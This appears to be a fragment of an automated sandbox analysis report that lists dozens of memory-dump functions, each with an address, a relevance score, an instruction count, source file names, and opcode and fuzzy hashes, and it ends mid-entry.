                                                                                              Function 00007FFD9BA9C265 Relevance: .2, Instructions: 168COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8ca83f9ad622a7cad5611a33314a3c24209f1d636b329d7d432c1267ec512410
                                                                                              • Instruction ID: 6e5befd6d60f96b368f3a89a455bf91aa8259c9aee40589dd3fa07941df2b12c
                                                                                              • Opcode Fuzzy Hash: 8ca83f9ad622a7cad5611a33314a3c24209f1d636b329d7d432c1267ec512410
                                                                                              • Instruction Fuzzy Hash: 74513831A0E64E8FEB24ABA8D8246FD7BA0FF04315F0501BBD459C61E2DF786599CB40
                                                                                              Function 00007FFD9BAA42C8 Relevance: .2, Instructions: 168COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2af11fd73763a48fb932ae6c0785c17aa54b9c54ca5d72676fa44be890165111
                                                                                              • Instruction ID: 03479979a640aa24cf9602f7646d7aef8bae00b83641eeb16efe68a359f1737b
                                                                                              • Opcode Fuzzy Hash: 2af11fd73763a48fb932ae6c0785c17aa54b9c54ca5d72676fa44be890165111
                                                                                              • Instruction Fuzzy Hash: 4D51E731A0E68E8FEBA5AB6488352F93AE1FF15310F0505BEF858C61F3DE6866448751
                                                                                              Function 00007FFD9BAA81A0 Relevance: .2, Instructions: 168COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: deecac5780294a3c55fc8397f8d82e9dd1feb2a01d9f8fe5ca1ee5301fe9be7f
                                                                                              • Instruction ID: 337ad079fa709b0d114a7bc97b50d0fbad46b0c922fbaa38ade7ce2ce0533149
                                                                                              • Opcode Fuzzy Hash: deecac5780294a3c55fc8397f8d82e9dd1feb2a01d9f8fe5ca1ee5301fe9be7f
                                                                                              • Instruction Fuzzy Hash: 7051E631A1EA5E8FDBA8EB5884395BD7BE0FF49304F1101BAE429C71E5DE74A600CB41
                                                                                              Function 00007FFD9BA92A68 Relevance: .2, Instructions: 166COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 51d59b5b0d72c1e922e20eaf78b27dee966ad07f60950b26494ef0895ec015f9
                                                                                              • Instruction ID: 3be0a56f5483e52d12d12b472a99c479eb031a75b6fca0ca24cb632664cadbed
                                                                                              • Opcode Fuzzy Hash: 51d59b5b0d72c1e922e20eaf78b27dee966ad07f60950b26494ef0895ec015f9
                                                                                              • Instruction Fuzzy Hash: FC519334A0E68E8FEB659B68C8242FD7BB1EF05310F0545BBD419C61E2DBB86644CB51
                                                                                              Function 00007FFD9BAA2F98 Relevance: .2, Instructions: 166COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5074202933e2e1bb54c5a77cd3482511544be48a2317eeec828f65df20deed05
                                                                                              • Instruction ID: fd5ae9fd8c9fa58710b3ff353b13862961120ae2869943aaee7361613d7f65ac
                                                                                              • Opcode Fuzzy Hash: 5074202933e2e1bb54c5a77cd3482511544be48a2317eeec828f65df20deed05
                                                                                              • Instruction Fuzzy Hash: 54512530A0EA4E8FEB69EB6488756B97BE1FF19300F0144BEE41DC61B2DE786644C751
                                                                                              Function 00007FFD9BA9BB2A Relevance: .2, Instructions: 163COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 70899edb4d52cd58b51b63b933e42e70b1a7d9f1604cf9249d88ab65f28cf93a
                                                                                              • Instruction ID: 0f5bde8f3b19654027d7e85059b89f583cefd9312035bc4b6bb0442f621f451c
                                                                                              • Opcode Fuzzy Hash: 70899edb4d52cd58b51b63b933e42e70b1a7d9f1604cf9249d88ab65f28cf93a
                                                                                              • Instruction Fuzzy Hash: 7051C874E1991D8EEBA4EBA884657EDB7B1FF58300F41407AD01DE32A2DE746A419B40
                                                                                              Function 00007FFD9BAA6D38 Relevance: .2, Instructions: 163COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ce2590d5c35a6a07cb1bbf63d22d3806d9c1d95710ed8469953e2a2f13517312
                                                                                              • Instruction ID: 41c2c65a96f7b6665684ed7161604675cb9bce3c7ce15154132cef36a08cf3b1
                                                                                              • Opcode Fuzzy Hash: ce2590d5c35a6a07cb1bbf63d22d3806d9c1d95710ed8469953e2a2f13517312
                                                                                              • Instruction Fuzzy Hash: 2A518334A0E68E8FEB659B68C8342FD7BB1FF05310F0545BAD419C61E2DBB85644CB51
                                                                                              Function 00007FFD9BA91D69 Relevance: .2, Instructions: 162COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0b37add51148f0077396dfea21566df06b679aa67c08e51ffe715265490baafa
                                                                                              • Instruction ID: aab26f10b9925b69034b11d3b36d5fc6a618c261dce2e67c537f5684d0ab9c62
                                                                                              • Opcode Fuzzy Hash: 0b37add51148f0077396dfea21566df06b679aa67c08e51ffe715265490baafa
                                                                                              • Instruction Fuzzy Hash: B1417D31B18A4D4BDB5CDF4888A55BA73E2FBE8705B10453EE45AC3295DE70E9028B81
                                                                                              Function 00007FFD9BA930E0 Relevance: .2, Instructions: 158COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7743d325c29afa7fdfcd2c8b2c1cfff71bffadfb553f34aeec2d8429b4193739
                                                                                              • Instruction ID: f19838fd090eda17b338a1ed525dc80b77d44b9704e06f3bbd17210f2ce6b5e2
                                                                                              • Opcode Fuzzy Hash: 7743d325c29afa7fdfcd2c8b2c1cfff71bffadfb553f34aeec2d8429b4193739
                                                                                              • Instruction Fuzzy Hash: 3051C431E5E24E8FEB659BB488652FD7BF0EF05304F52047AD408C61F2EAB8A604D701
                                                                                              Function 00007FFD9BA9125D Relevance: .2, Instructions: 157COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 271b11138112c123df24143d5106c1067724ae60fef076a16c11d405596d2307
                                                                                              • Instruction ID: df2417ce0fad4075592757368d92654a3bbc826e92b0a6079c649a401190aa44
                                                                                              • Opcode Fuzzy Hash: 271b11138112c123df24143d5106c1067724ae60fef076a16c11d405596d2307
                                                                                              • Instruction Fuzzy Hash: A851C431A0964E8FEB99EBA8C4696F97BF0FF29310F0504BED009D71E2DE656544C740
                                                                                              Function 00007FFD9BAF0CD0 Relevance: .2, Instructions: 157COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1933134a91513ea9886d9f95940f63624d6417a5ec2ab7ffd5b82e47ebfda3f4
                                                                                              • Instruction ID: 0da64c3390abcd4c3725ac8c7ccf8a86877c6e131160ebde9b440a360097899a
                                                                                              • Opcode Fuzzy Hash: 1933134a91513ea9886d9f95940f63624d6417a5ec2ab7ffd5b82e47ebfda3f4
                                                                                              • Instruction Fuzzy Hash: 0D516C30E19A4E8FEB64EFA4C8646EDBBE1FF18300F41417AD009D71A6DE78A5448B45
                                                                                              Function 00007FFD9BA92E29 Relevance: .2, Instructions: 156COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6d72d543a15130a91af4010f86070fecd08c9c7f2703efc61e4fba4b3b0e8847
                                                                                              • Instruction ID: 153e8d6bf613fb72a21edf8b700979425213a50aade6db66722dfaba8f427725
                                                                                              • Opcode Fuzzy Hash: 6d72d543a15130a91af4010f86070fecd08c9c7f2703efc61e4fba4b3b0e8847
                                                                                              • Instruction Fuzzy Hash: FB51C731A4F38E8FE7659BE488656F97BF0EF01300F0545B6D448C60E2EAB8A658D741
                                                                                              Function 00007FFD9BA9B658 Relevance: .2, Instructions: 152COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: abbe31280f59ebfbc2d04745333a06947cc73d19c794716cd51ac55baa07e37f
                                                                                              • Instruction ID: 72e7a0bceb9fb5b2e6d9b721a45a419e517eabc4078b3d5aa6f4d9dcc59c762a
                                                                                              • Opcode Fuzzy Hash: abbe31280f59ebfbc2d04745333a06947cc73d19c794716cd51ac55baa07e37f
                                                                                              • Instruction Fuzzy Hash: 3B513C30E1A64E8FEB65DFA4C8646ED7BF0FF09300F41457AD409D72A1DAB8AA44DB41
                                                                                              Function 00007FFD9BAA5148 Relevance: .2, Instructions: 151COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a91e13fb3353bdfc85a07578ac4d2c39be5cca9f4c69d4ccccb65e059592bf88
                                                                                              • Instruction ID: c170a460bdd7c706b1c52b866043fc147157b3ed1eec9887efd1e082062d8008
                                                                                              • Opcode Fuzzy Hash: a91e13fb3353bdfc85a07578ac4d2c39be5cca9f4c69d4ccccb65e059592bf88
                                                                                              • Instruction Fuzzy Hash: 9D513971A0951E8FDBA0EF18C854BEAB7F5FF59314F0101BA940DE3251EB74AA80CB90
                                                                                              Function 00007FFD9BA9BF88 Relevance: .1, Instructions: 142COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 55e04cc89d14901e5d90565a8cd781a96d6785e5c12bb8b2365e162b3dca7c3d
                                                                                              • Instruction ID: 0bafe3abce99e4b2352d2b3b4a842233872dce354f3cca04b262d76a719324ea
                                                                                              • Opcode Fuzzy Hash: 55e04cc89d14901e5d90565a8cd781a96d6785e5c12bb8b2365e162b3dca7c3d
                                                                                              • Instruction Fuzzy Hash: 3741513090EB8E8FEB95EF6888695A97FF0FF15300F0505ABD459C71A2DB789648CB41
                                                                                              Function 00007FFD9BA9C2D3 Relevance: .1, Instructions: 141COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1ccfa0b8da5e6567319f6af819ba489b642b5cc269559a2129989db3d866df75
                                                                                              • Instruction ID: 94cea7ffe64eed5100929b368e9c2ca9aaec56b657c2f63cc6d8b38390e94571
                                                                                              • Opcode Fuzzy Hash: 1ccfa0b8da5e6567319f6af819ba489b642b5cc269559a2129989db3d866df75
                                                                                              • Instruction Fuzzy Hash: 7F41F131A0EA4E8FEB64AFA4C8246F97BA0FF05310F4100BBD409C71E2EB786658D740
                                                                                              Function 00007FFD9BA931C0 Relevance: .1, Instructions: 132COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 093de8df37f95157461c129e9d1d6e3de4ce03c7fb0a66a352d89464d00a448e
                                                                                              • Instruction ID: 005b3c3e73e92cbea7b61820d8948f91658945b4877d857a69bb02e3ca4ce570
                                                                                              • Opcode Fuzzy Hash: 093de8df37f95157461c129e9d1d6e3de4ce03c7fb0a66a352d89464d00a448e
                                                                                              • Instruction Fuzzy Hash: 9E41AE31E0A60D8FEB64EFA4D8646EE77F0EF15314F01013AD409D71A1EB78A644DB41
                                                                                              Function 00007FFD9BA9A790 Relevance: .1, Instructions: 131COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 51798f435b5481948e3313be719756c8eed7d18b7f8bf813358b2ffb65ec1427
                                                                                              • Instruction ID: 406aee4cc17525bb6bd97db65e292a41b97b73cab50c06766be7171736a9f4ed
                                                                                              • Opcode Fuzzy Hash: 51798f435b5481948e3313be719756c8eed7d18b7f8bf813358b2ffb65ec1427
                                                                                              • Instruction Fuzzy Hash: F941E130A1D64E8FDB65EF7888286F93BE0FF59304F4546BBD409C71A6EA38A540C741
                                                                                              Function 00007FFD9BAA0698 Relevance: .1, Instructions: 130COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d895784b874e6e4a617abd2f0ebf6f5c25548e82fda2657d16f6f90bef1bc7a4
                                                                                              • Instruction ID: 0c4e500ef848fae892177dbae69a1046539e308a19faf3a364c579000675dd95
                                                                                              • Opcode Fuzzy Hash: d895784b874e6e4a617abd2f0ebf6f5c25548e82fda2657d16f6f90bef1bc7a4
                                                                                              • Instruction Fuzzy Hash: 78415F30A0E68E8FEBA59F6488246FA7BF1FF15700F01457AD41DC71A2DBB86A548B41
                                                                                              Function 00007FFD9BAA1D18 Relevance: .1, Instructions: 129COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0e6c7f836dbc4032f4f5734070045af965a6f680d65b821866fa0949e01ff8e7
                                                                                              • Instruction ID: 56ace7835a5d37755f7fb92ebfc33f0c04c070c30747e22d18744298677ba57e
                                                                                              • Opcode Fuzzy Hash: 0e6c7f836dbc4032f4f5734070045af965a6f680d65b821866fa0949e01ff8e7
                                                                                              • Instruction Fuzzy Hash: ED41AF70E0A24E9FDB64DFA4C4A52FE7BF1EF29310F11453AE405932A1DB78A644CB90
                                                                                              Function 00007FFD9BA924F2 Relevance: .1, Instructions: 128COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0c0713187b874c4b639d6013ec510d2281076e7c33331e694b804703aead28db
                                                                                              • Instruction ID: e996ca98220313d02f57a2e334e2e0ae319069ac2a424906be4bd5675611a02b
                                                                                              • Opcode Fuzzy Hash: 0c0713187b874c4b639d6013ec510d2281076e7c33331e694b804703aead28db
                                                                                              • Instruction Fuzzy Hash: 0E316E31A0E64E0FE769DBA498614F577E0EF51320F0602B7D448CB0B6D97CBA4683D1
                                                                                              Function 00007FFD9BAA4358 Relevance: .1, Instructions: 126COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 624695ae3cb1a308534926616ecfb4f7d63fbcad5f6c625a41f4b220ace21118
                                                                                              • Instruction ID: e5e876b278b8033eacba42a515a2282d4fee60580e8835e2636f137e0fc20902
                                                                                              • Opcode Fuzzy Hash: 624695ae3cb1a308534926616ecfb4f7d63fbcad5f6c625a41f4b220ace21118
                                                                                              • Instruction Fuzzy Hash: 1B41F531A0E68E8FEBA59B6488352B93AE1BF15310F0501BEF858C61F3DEA86644C751
                                                                                              Function 00007FFD9BA9C128 Relevance: .1, Instructions: 124COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5ec5b55ae375b146cac7e37641b2e6e8df60f1de208ec5acb5aef991bf1e0bf3
                                                                                              • Instruction ID: 3ef5bc2dbf32dce71892b6889479ca7e19f818631a074070fad1eda3d8850994
                                                                                              • Opcode Fuzzy Hash: 5ec5b55ae375b146cac7e37641b2e6e8df60f1de208ec5acb5aef991bf1e0bf3
                                                                                              • Instruction Fuzzy Hash: 54419030A0974E8FDB65EB98C464AF93BB1FF59304F0105BAD00ADB1A6CB79A945CB50
                                                                                              Function 00007FFD9BAA7D41 Relevance: .1, Instructions: 123COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c32e3dac6fdf8167126936aeb0e3d13c0080d033a2446fef3504f6a43e5dd5fc
                                                                                              • Instruction ID: f4fb89160779f1636687825cb1c5323427d898d92e28146b2ea5760a4c42ca36
                                                                                              • Opcode Fuzzy Hash: c32e3dac6fdf8167126936aeb0e3d13c0080d033a2446fef3504f6a43e5dd5fc
                                                                                              • Instruction Fuzzy Hash: C6313632E0990C4BDF64EF9498509FAF7B5EF99320F01117BD01DD3181DAB59E458B94
                                                                                              Function 00007FFD9BA91270 Relevance: .1, Instructions: 122COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 133db5ea5801a3c0c295c2a88aa4781cd2a8b541aeb429ab8028e85a8da3f0ab
                                                                                              • Instruction ID: e83675c348a288ff8683475ab7527dcc4f049f4227dd4b0f5c2c503aa717e5b4
                                                                                              • Opcode Fuzzy Hash: 133db5ea5801a3c0c295c2a88aa4781cd2a8b541aeb429ab8028e85a8da3f0ab
                                                                                              • Instruction Fuzzy Hash: 3B31C631B0E68E8FEBA4EBA888656FE77F0FF65310F05007AD409D71E2DAA46904C740
                                                                                              Function 00007FFD9BA9C740 Relevance: .1, Instructions: 120COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: cfb937e636f54c1f43d6188ded47302bee8a40655c727033f835ee4b6028c0d4
                                                                                              • Instruction ID: 2767cec6c69e0e24cfaa05741560e280a3cfdc04007dbc9078dd52710aa453c2
                                                                                              • Opcode Fuzzy Hash: cfb937e636f54c1f43d6188ded47302bee8a40655c727033f835ee4b6028c0d4
                                                                                              • Instruction Fuzzy Hash: 6D41E430A0AA4E8FEBACEF6884796B97BE1FF19300F0144BED41DC21A2DE756144CB51
                                                                                              Function 00007FFD9BAA81A8 Relevance: .1, Instructions: 119COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 83f303dd94c456ad500b8d0604fa9b0b7af7751af49a99a923a19075b67c639e
                                                                                              • Instruction ID: 274535a9665c9b30a4d81a2a92937ed32d64eca917843758a1e7e62c68386a1c
                                                                                              • Opcode Fuzzy Hash: 83f303dd94c456ad500b8d0604fa9b0b7af7751af49a99a923a19075b67c639e
                                                                                              • Instruction Fuzzy Hash: 3041F631F1E92E8BD76CAB5944795BD7BA1FF89318F11017AD02EC71E5CD78A6008B41
                                                                                              Function 00007FFD9BAA7FBA Relevance: .1, Instructions: 110COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 84d124419477acfd07e07f7c09ea4e36a393b96fb6cd98db2b2f06ad2b5ccdd0
                                                                                              • Instruction ID: d9b4a04489f767e96a261221dd114d3fd6dfc3592f46943ce9a91873131a63e1
                                                                                              • Opcode Fuzzy Hash: 84d124419477acfd07e07f7c09ea4e36a393b96fb6cd98db2b2f06ad2b5ccdd0
                                                                                              • Instruction Fuzzy Hash: A8318375E0AA1D9EEBB0DF888850BE973B1FF24320F4101B6D05DE3190DE746B858B60
                                                                                              Function 00007FFD9BA92EB8 Relevance: .1, Instructions: 110COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f51ce7eb0a3bbd8efb03ab17d2242f2f186e4df6ee65c41b896f9a3776c1129e
                                                                                              • Instruction ID: acf686ca99bf2840dbbd025f09e3814d9b4738cc46fdd554998c509d8f26b594
                                                                                              • Opcode Fuzzy Hash: f51ce7eb0a3bbd8efb03ab17d2242f2f186e4df6ee65c41b896f9a3776c1129e
                                                                                              • Instruction Fuzzy Hash: B841D671E0F78E8FE7659BE488652F97BF0AF01310F064576D408C61E2EAB8A658D741
                                                                                              Function 00007FFD9BAA5889 Relevance: .1, Instructions: 109COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
